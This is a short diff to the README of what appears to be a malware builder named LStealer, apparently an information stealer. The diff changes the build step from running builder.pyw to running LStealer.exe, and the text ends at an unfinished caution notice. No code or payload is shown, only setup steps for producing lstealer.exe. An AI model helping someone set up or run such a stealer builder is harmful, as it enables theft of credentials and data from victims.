LStealers/LStealer/README.md

 1. [Download ZIP file]
 2. Extract zip
 3. First install reqiured packages by double clicking `install.bat` file
-4. Run the builder by double clicking the `builder.pyw` file
+4. Run the builder by double clicking the `LStealer.exe` file
 5. Follow instructions in builder and your exe will be found in the `internal\dist` folder under the name `lstealer.exe`

 > [!CAUTION]